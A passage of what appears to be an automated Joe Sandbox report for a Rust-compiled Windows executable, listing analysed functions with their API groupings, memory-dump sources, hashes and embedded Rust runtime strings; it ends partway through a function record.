                                      Function 00007FF7D4342190 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 455COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FullNamePath
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$\\?\\\?\UNC\
                                      • API String ID: 2482867836-482199288
                                      • Opcode ID: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                      • Instruction ID: 036332f5131e47f85e3f23d674b94122635efd091cfa930bf01c1c4958461d4a
                                      • Opcode Fuzzy Hash: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                      • Instruction Fuzzy Hash: 4C129662A0468285EB74AF9AD8843FDA354FB04BD8FC0853BDE5D77684DF78D5818360
                                      Function 00007FF7D431CEC0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 244filenativesynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                      • String ID: called `Result::unwrap()` on an `Err` value
                                      • API String ID: 3090192319-2333694755
                                      • Opcode ID: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                      • Instruction ID: fdcf08143973571f6ab422c3f4de3a666cab1247ea89f4c69b88b7e87a189fda
                                      • Opcode Fuzzy Hash: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                      • Instruction Fuzzy Hash: 87B19962E0869255FB10AF6AE4803FD6770AB45758FC4413ADE5E22A95DF3CE185C330
                                      Function 00007FF7D435A9C0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 313767242-0
                                      • Opcode ID: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                      • Instruction ID: ae1fa06478ac6253b40f3ba08bc8a25f34f185bf768aabb5670dd6daf771275a
                                      • Opcode Fuzzy Hash: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                      • Instruction Fuzzy Hash: 1F313C72608B818AEB64AF66E8807EDB760FB84744F84403ADA4D57B98DF38D548C720
                                      Function 00007FF7D43208B9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 362windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • NTDLL.DLL, xrefs: 00007FF7D43208F7
                                      • assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF7D4320F46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: FormatHandleMessageModulememmovememset
                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs
                                      • API String ID: 2025335819-1565840215
                                      • Opcode ID: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                      • Instruction ID: 5d604d19a891961dac9c65b9cd76b60ef34cdf683aadd178a37d2db6ecef1a53
                                      • Opcode Fuzzy Hash: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                      • Instruction Fuzzy Hash: 60F18332909AC299E7759F2AD8807FCB760F704788FC0413BDA5D1AAD9CF789289D350
                                      Function 00007FF7D4349530 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D434957D
                                      • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D434965A
                                      • UpdateProcThreadAttribute.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF7D43496BA
                                      Strings
                                      • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF7D43498EE, 00007FF7D4349908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$InitializeList$Update
                                      • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                      • API String ID: 3806694049-556906072
                                      • Opcode ID: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                      • Instruction ID: 86b85f4e94e3b0492ad89546aa56952f81146677f294268556f04c909d41bf1f
                                      • Opcode Fuzzy Hash: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                      • Instruction Fuzzy Hash: 63A1C222B1865181FA14AF6FD8807FDA6A0BF45BA4FD4423ADE6D277D0DE3DA041C320
                                      Function 00007FF7D435A89C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                      • Instruction ID: 417fff2e4d31312e88d4d1aed63c05ac916eee0f621c1226bcfda3ce732a9570
                                      • Opcode Fuzzy Hash: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                      • Instruction Fuzzy Hash: 41117022B14F018AFB00EF66E8852BC73A4F719758F840E36DAAD927A4DF3CD1948350
                                      Function 00007FF7D4340D00 Relevance: 4.6, APIs: 3, Instructions: 85filenativesynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorFileObjectReadSingleStatusWait
                                      • String ID:
                                      • API String ID: 3583596364-0
                                      • Opcode ID: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                      • Instruction ID: b66a8e891afcaf0beea3d1b29337e68e72e358c12f470e34eb16e303e04acc51
                                      • Opcode Fuzzy Hash: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                      • Instruction Fuzzy Hash: 82313532A08B8186E764DF19F4903AEB3A5FB85350F908136E6DD52B94DF7CE0C48B10
                                      Function 00007FF7D4359490 Relevance: 4.4, Strings: 3, Instructions: 653COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                      • API String ID: 1475443563-487299250
                                      • Opcode ID: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                      • Instruction ID: aedad1801aa90a9e8aac9d2792989e018f3348b20816ff2a3f7ef7abcde66bbd
                                      • Opcode Fuzzy Hash: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                      • Instruction Fuzzy Hash: 00422462E1C69241FA64AE1ED49437EAEB1AF45390FC4413FDAAE266D0DF3CE544C720
                                      Function 00007FF7D4314DF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 587COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899core\src\fmt\mod.rs
                                      • API String ID: 1475443563-2454368799
                                      • Opcode ID: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                      • Instruction ID: 62cebdb91971e99910a87b3d4c517c1746fc73480ba12f5a7f763df3fd93bc7b
                                      • Opcode Fuzzy Hash: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                      • Instruction Fuzzy Hash: DF224922B187A146EB24DF2AD444BBDA661BB117A4FD15336DE6E63BC0DF3CE5418320
                                      Function 00007FF7D43395C0 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 426COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: ErrorHandleLast
                                      • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                      • API String ID: 2586478127-1397643090
                                      • Opcode ID: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                      • Instruction ID: affa4721831c393a286321c4ba817d893424cf828741ff5acf5cceae9498ea90
                                      • Opcode Fuzzy Hash: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                      • Instruction Fuzzy Hash: C1E1EF62B0968686EA14AF5FE8886BDA690FF44794FC0453ADE0E27794DF3CE481C310
                                      Function 00007FF7D43553E0 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 412COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: punycode{-}0
                                      • API String ID: 2221118986-2450133883
                                      • Opcode ID: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                      • Instruction ID: a5f4e8264ee7079b2ea051a3948b8a998c6e50b7b88c27fc14b1c3bf78bf6d2b
                                      • Opcode Fuzzy Hash: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                      • Instruction Fuzzy Hash: D0E12762B1D78582EA209F1AE48437DAB91BB95790FC4853BDE8D13798EE3CF445C710
                                      Function 00007FF7D4316650 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 402COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: punycode{-}0
                                      • API String ID: 2221118986-2450133883
                                      • Opcode ID: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                      • Instruction ID: 1aea7c0c695a288c2bca6909fea2d694d30f450a253385783c0fb543e7c4173c
                                      • Opcode Fuzzy Hash: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                      • Instruction Fuzzy Hash: 37E11662B0868547EB649F6BD4847FDA661BB44794FC8823BCD1D27BC4DF3CA5618320
                                      Function 00007FF7D431B590 Relevance: 3.3, Strings: 2, Instructions: 806COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,(><&*@$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 0-898078177
                                      • Opcode ID: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                      • Instruction ID: 80a0c346688292f82ba73e1a9e1d22a3b44e743ce1f59d4c11e2dbec7f1c8ffe
                                      • Opcode Fuzzy Hash: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                      • Instruction Fuzzy Hash: 10623422E1C69241EA65AF2ED4C46BCAB70AB09794FC4423BDA5E277D4DE3CE5418730
                                      Function 00007FF7D4353AE0 Relevance: 3.3, Strings: 2, Instructions: 778COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value
                                      • API String ID: 0-1380848348
                                      • Opcode ID: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                      • Instruction ID: cfc42d4bd6e7efc66b35a83d1566e225407b8c67796a68290a93e8e7fddd4360
                                      • Opcode Fuzzy Hash: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                      • Instruction Fuzzy Hash: 20525322A1C68245EA68AF1FE4C53BDEE81AB51794FC4413FDA9D366D9DE3DE500C320
                                      Function 00007FF7D434E670 Relevance: 2.9, APIs: 2, Instructions: 447COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memmovememset
                                      • String ID:
                                      • API String ID: 1288253900-0
                                      • Opcode ID: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                      • Instruction ID: 460ba4cfccec2898c9916450731ed5daa2eab9221c8f47396ae66282e8f2e263
                                      • Opcode Fuzzy Hash: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                      • Instruction Fuzzy Hash: 78029966D28FD941E223973968067FBAB10AFF7748F51E31BFEC831E15DB18A2019214
                                      Function 00007FF7D435D3D0 Relevance: 2.9, APIs: 2, Instructions: 413COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.VCRUNTIME140(?,?,?,?,00000000,?,?,-00000008,?,00000000,00007FF7D432D020), ref: 00007FF7D435D898
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                      • Instruction ID: 99d206684ab6e2035bfdbd115f4e3a107ac216cecfa1174677b61fff465a8bb3
                                      • Opcode Fuzzy Hash: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                      • Instruction Fuzzy Hash: 68F14752A0E6E585DB119F2E804017DAF60EB527A4F99C33ADFB8277C2DA3CD146D320
                                      Function 00007FF7D434FCD0 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 33333333$UUUUUUUU
                                      • API String ID: 0-3483174168
                                      • Opcode ID: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                      • Instruction ID: 9f65aa689f48d9da1cb3338e6f3165f74d93f4c1ad144cb72cf1e876bc014956
                                      • Opcode Fuzzy Hash: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                      • Instruction Fuzzy Hash: 2F91C783B581F003F7624B7D2D6656AEFA25406BD370DF452EED427A86C038CC2AE365
                                      Function 00007FF7D43500F0 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 33333333$UUUUUUUU
                                      • API String ID: 0-3483174168
                                      • Opcode ID: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                      • Instruction ID: ea4d446fc81061f085101c1a00567688634e4e3d448364d1291719dfb932fb5e
                                      • Opcode Fuzzy Hash: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                      • Instruction Fuzzy Hash: 5291728331A7D48FAB52C7BE1C44D8A5ED1906AFC836CF06DDE882B722D026D553D362
                                      Function 00007FF7D433E590 Relevance: 2.5, APIs: 2, Instructions: 46memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2451896397.00007FF7D4311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D4310000, based on PE: true
                                      • Associated: 00000000.00000002.2451876495.00007FF7D4310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451939524.00007FF7D435E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2451986662.00007FF7D4378000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2452009616.00007FF7D4379000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff7d4310000_VKJITO.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: 3f7b8d41f007b0abe3c660969c98f685866053bc2d9d3726f5159995cf175db0
